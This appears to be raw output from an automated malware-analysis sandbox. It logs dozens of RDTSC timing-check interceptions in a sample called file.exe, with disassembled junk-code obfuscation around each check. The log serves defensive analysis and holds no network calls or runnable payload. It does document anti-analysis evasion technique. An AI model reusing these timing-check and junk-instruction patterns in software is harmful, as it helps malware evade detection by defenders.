Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D30293 second address: D302C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7A4900AE76h 0x00000009 jmp 00007F7A4900AE77h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D302C4 second address: D302C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3047A second address: D30484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7A4900AE66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3207A second address: D32080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D32080 second address: D3209F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A4900AE76h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3497E second address: D34996 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7A49940183h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D34BE0 second address: D34BEA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D34BEA second address: D34BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D34CDC second address: D34CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D34CE0 second address: D34CE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D34CE6 second address: D34D1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A4900AE76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7A4900AE75h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push edi 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D34D1E second address: D34D30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 mov eax, dword ptr [eax] 0x00000008 js 00007F7A49940193h 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D34D30 second address: D34D56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A4900AE75h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007F7A4900AE66h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370EBC second address: 5370EE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A4994017Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7A49940185h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370EE8 second address: 5370EF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7A4900AE6Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53C0030 second address: 53C0036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53C0036 second address: 53C0043 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53C0043 second address: 53C00BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 call 00007F7A49940184h 0x0000000a push eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d popad 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F7A49940183h 0x00000018 add cx, 15DEh 0x0000001d jmp 00007F7A49940189h 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007F7A49940180h 0x00000029 xor ch, FFFFFFD8h 0x0000002c jmp 00007F7A4994017Bh 0x00000031 popfd 0x00000032 popad 0x00000033 mov ebp, esp 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53C00BF second address: 53C00C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 535010D second address: 5350113 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350113 second address: 5350117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350117 second address: 535011B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 535011B second address: 53501B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F7A4900AE76h 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 mov ebx, esi 0x00000014 pushfd 0x00000015 jmp 00007F7A4900AE6Ah 0x0000001a add si, 8B28h 0x0000001f jmp 00007F7A4900AE6Bh 0x00000024 popfd 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 jmp 00007F7A4900AE76h 0x0000002d push dword ptr [ebp+04h] 0x00000030 pushad 0x00000031 push esi 0x00000032 pushfd 0x00000033 jmp 00007F7A4900AE6Dh 0x00000038 adc eax, 09DA69F6h 0x0000003e jmp 00007F7A4900AE71h 0x00000043 popfd 0x00000044 pop esi 0x00000045 movsx ebx, cx 0x00000048 popad 0x00000049 push dword ptr [ebp+0Ch] 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F7A4900AE6Fh 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53501B9 second address: 53501D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7A49940184h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53501D1 second address: 53501E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7A4900AE6Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53501E8 second address: 53501EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53501EE second address: 53501F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350227 second address: 5350236 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A4994017Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350236 second address: 535024E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7A4900AE74h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 535024E second address: 5350252 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370C23 second address: 5370C5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A4900AE79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7A4900AE71h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov bx, E20Eh 0x00000017 mov ecx, edx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370738 second address: 537073C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 537073C second address: 5370742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370742 second address: 537075F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7A49940189h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 537075F second address: 53707A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F7A4900AE6Ah 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F7A4900AE70h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F7A4900AE77h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53707A0 second address: 53707B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7A49940184h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53707B8 second address: 53707E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A4900AE6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7A4900AE75h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370696 second address: 537069A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 537069A second address: 53706A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370412 second address: 5370452 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A49940185h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F7A4994017Eh 0x0000000f mov ebp, esp 0x00000011 jmp 00007F7A49940180h 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370452 second address: 537045A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edi, ax 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 537045A second address: 5370460 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370460 second address: 5370464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 538031E second address: 5380322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380322 second address: 5380328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380328 second address: 5380330 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, cx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380330 second address: 5380372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov dx, 9C10h 0x0000000f pushfd 0x00000010 jmp 00007F7A4900AE79h 0x00000015 and esi, 45200A96h 0x0000001b jmp 00007F7A4900AE71h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380372 second address: 5380382 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7A4994017Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380382 second address: 5380386 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0EEB second address: 53B0EEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0EEF second address: 53B0EF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0EF5 second address: 53B0F16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A4994017Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7A4994017Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0F16 second address: 53B0F1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0F1B second address: 53B0F66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F7A4994017Dh 0x0000000a and ecx, 205A8A76h 0x00000010 jmp 00007F7A49940181h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F7A49940188h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0F66 second address: 53B0F6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0F6A second address: 53B0F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390405 second address: 5390418 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A4900AE6Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390418 second address: 539041E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 539041E second address: 5390422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390422 second address: 539049C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F7A4994017Ch 0x00000010 sub al, FFFFFFD8h 0x00000013 jmp 00007F7A4994017Bh 0x00000018 popfd 0x00000019 call 00007F7A49940188h 0x0000001e pushfd 0x0000001f jmp 00007F7A49940182h 0x00000024 sbb esi, 64C81268h 0x0000002a jmp 00007F7A4994017Bh 0x0000002f popfd 0x00000030 pop ecx 0x00000031 popad 0x00000032 xchg eax, ebp 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F7A49940182h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 539049C second address: 53904B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A4900AE6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov cl, dl 0x00000010 mov dh, ah 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53904B5 second address: 53904DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A49940186h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 mov ax, bx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53904DB second address: 53904EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov bx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and dword ptr [eax], 00000000h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53904EF second address: 53904F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53904F3 second address: 5390502 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A4900AE6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390502 second address: 5390508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390508 second address: 5390543 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax+04h], 00000000h 0x0000000c jmp 00007F7A4900AE77h 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7A4900AE75h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390543 second address: 5390553 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7A4994017Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390553 second address: 5390557 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370587 second address: 537058B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 537058B second address: 53705A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A4900AE77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380EBA second address: 5380EC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380EC0 second address: 5380ED9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7A4900AE75h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380ED9 second address: 5380F20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A49940181h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F7A4994017Eh 0x00000011 push eax 0x00000012 jmp 00007F7A4994017Bh 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F7A49940180h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380F20 second address: 5380F24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380F24 second address: 5380F2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380F2A second address: 5380F57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A4900AE6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7A4900AE77h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380F57 second address: 5380F5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380F5D second address: 5380F61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380F61 second address: 5380F76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7A4994017Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380F76 second address: 5380F7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380F7B second address: 5380F81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390287 second address: 53902BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, 03h 0x00000005 mov edi, 5E646894h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F7A4900AE73h 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 call 00007F7A4900AE6Bh 0x0000001d pop ecx 0x0000001e mov dh, 3Ah 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B06B8 second address: 53B073A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A49940186h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F7A4994017Ch 0x00000011 jmp 00007F7A49940185h 0x00000016 popfd 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F7A4994017Ch 0x00000020 jmp 00007F7A49940185h 0x00000025 popfd 0x00000026 mov ch, C4h 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F7A49940186h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B073A second address: 53B0740 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0740 second address: 53B0744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0744 second address: 53B076D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007F7A4900AE76h 0x0000000e mov dword ptr [esp], ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 movsx edx, si 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B076D second address: 53B07CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A49940182h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [76FB65FCh] 0x0000000e pushad 0x0000000f pushad 0x00000010 mov esi, ebx 0x00000012 pushfd 0x00000013 jmp 00007F7A4994017Fh 0x00000018 adc cl, FFFFFFCEh 0x0000001b jmp 00007F7A49940189h 0x00000020 popfd 0x00000021 popad 0x00000022 popad 0x00000023 test eax, eax 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 call 00007F7A4994017Ah 0x0000002d pop ecx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B07CB second address: 53B07FE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop esi 0x00000009 push edx 0x0000000a pop eax 0x0000000b popad 0x0000000c popad 0x0000000d je 00007F7ABAB8DFF4h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov cl, D3h 0x00000018 call 00007F7A4900AE79h 0x0000001d pop ecx 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B07FE second address: 53B087B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A4994017Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d jmp 00007F7A4994017Dh 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007F7A49940181h 0x00000019 adc cl, 00000026h 0x0000001c jmp 00007F7A49940181h 0x00000021 popfd 0x00000022 popad 0x00000023 xor eax, dword ptr [ebp+08h] 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 jmp 00007F7A49940188h 0x0000002e jmp 00007F7A49940182h 0x00000033 popad 0x00000034 rdtsc
